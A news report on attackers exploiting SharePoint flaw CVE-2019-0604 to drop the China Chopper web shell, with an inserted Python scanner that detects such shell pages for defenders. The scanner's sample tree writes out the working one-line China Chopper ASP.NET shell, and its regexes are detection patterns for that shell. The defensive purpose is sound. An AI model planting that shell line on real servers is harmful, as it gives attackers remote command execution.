A major flaw in Microsoft’s SharePoint platform has been exploited in the wild.
Tracked as CVE-2019-0604, the security hole received its first patch in February and a second one in March after the first fix proved incomplete. Microsoft described the problem as a remote code execution flaw caused by the software's failure to check the source markup of an application package. It can be exploited without authentication.
In an advisory, Microsoft said: “An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.”
Markus Wulftange, the researcher who described the fault to Microsoft through Trend Micro’s Zero Day Initiative (ZDI), revealed details and proof-of-concept (PoC) code on March 13, one day after Microsoft issued the second round of patches.
Many PoC exploits were subsequently made public, and the first attacks exploiting CVE-2019-0604 were apparently spotted in early April.
“Trusted researchers have identified compromised systems belonging to the academic, utility, heavy industry, manufacturing and technology sectors,” the agency said.
According to a report published last year by Five Eyes cybersecurity agencies, China Chopper, which has been around since 2012, is one of the five most commonly used hacking tools.
Saudi Arabia's National Cyber Security Center issued an alert last week to warn organizations of attacks targeting the same vulnerability and delivering the same China Chopper web shell. The Saudi agency said it had spotted several "advanced groups" exploiting the flaw, mostly against organizations within the country.
The agency said the attackers used the web shell to deliver other tools.
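For defenders reviewing SharePoint servers after reading reports like the ones above, the practical question is how to find a dropped China Chopper page. The script below is an added example and is not code from the article or from any of the agencies or researchers it quotes. It scans a web root for ASP.NET pages that carry the widely documented China Chopper server-side pattern (an `eval()` over a request parameter, compiled "unsafe", in a page only a few dozen bytes long) and rates each hit. The directory layout, file names, indicator names and the 512-byte size threshold are all assumptions chosen for the example; the sample web root it builds is constructed inline so it runs offline.

```python
import re
import tempfile
from pathlib import Path

# Indicators for the China Chopper ASP.NET server side, which is widely documented
# as a single eval() over a request parameter compiled "unsafe" inside a tiny page.
# The indicator names are this example's own labels, not an agency taxonomy.
CHOPPER_PATTERNS = {
    "eval_over_request": re.compile(r'eval\s*\(\s*Request\.(?:Item|Form|Params)\s*\[', re.I),
    "unsafe_compile":    re.compile(r',\s*"unsafe"\s*\)', re.I),
    "jscript_page":      re.compile(r'Language\s*=\s*"?Jscript"?', re.I),
}
WEB_EXTS = (".aspx", ".ashx", ".asmx")
TINY_BYTES = 512  # assumed threshold: a shell page this small with eval() is the strongest signal


def scan_file(path):
    """Return the sorted names of the indicators found in one file."""
    text = Path(path).read_text(errors="ignore")
    return sorted(name for name, pat in CHOPPER_PATTERNS.items() if pat.search(text))


def scan_tree(root):
    """Walk a web root and map each suspicious page to its indicator hits and a verdict."""
    root = Path(root)
    findings = {}
    for p in root.rglob("*"):
        if not (p.is_file() and p.suffix.lower() in WEB_EXTS):
            continue
        hits = scan_file(p)
        if "eval_over_request" not in hits:
            continue  # eval() over a request parameter is the required indicator
        tiny = p.stat().st_size <= TINY_BYTES
        verdict = "high" if (tiny or len(hits) == len(CHOPPER_PATTERNS)) else "medium"
        findings[p.relative_to(root).as_posix()] = {"hits": hits, "verdict": verdict}
    return findings


def build_sample_tree():
    """Constructed sample web root: one benign page and one page carrying the shell pattern.

    The TEMPLATE/LAYOUTS layout mimics where SharePoint serves custom pages from; the
    file names are invented for this example.
    """
    root = Path(tempfile.mkdtemp(prefix="sp_layouts_"))
    layouts = root / "TEMPLATE" / "LAYOUTS"
    layouts.mkdir(parents=True)
    (layouts / "default.aspx").write_text(
        '<%@ Page Language="C#" %>\n<html><body>Welcome to the portal</body></html>\n')
    (layouts / "t.aspx").write_text(
        '<%@ Page Language="Jscript"%><%eval(Request.Item["pwd"],"unsafe");%>')
    return root


if __name__ == "__main__":
    for name, info in scan_tree(build_sample_tree()).items():
        print(f"{info['verdict']:6} {name}: {', '.join(info['hits'])}")
```

Point it at the real web application directories on a suspect server instead of the constructed tree; a hit rated "high" is worth correlating with the IIS logs for POST requests to that page, since the shell is driven entirely by request parameters.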
Researcher Kevin Beaumont has highlighted that the publicly available exploits don’t work out of the box. “If that changes I think this will be one of the biggest vulns in years. It would own a lot of enterprises. Like, a LOT,” the expert warned.
The vulnerability appears to have been exploited by both advanced persistent threat (APT) actors and financially motivated cybercrime groups; some links have been found to an infamous group tracked as FIN7, which was recently spotted using new malware.
AT&T Alien Labs reported on Friday that it had discovered what appeared to be an earlier version of the backdoor spotted by the Saudi agency. The malware, shared by someone in China, lets attackers execute commands on compromised systems and download or upload files.